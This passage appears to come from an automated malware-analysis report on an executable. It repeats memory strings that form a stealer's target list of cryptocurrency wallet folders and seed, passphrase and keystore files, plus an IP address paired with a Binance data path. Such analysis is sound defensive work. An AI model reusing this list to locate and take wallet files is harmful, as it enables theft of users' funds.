Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\Binance\app-store.jsont
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo 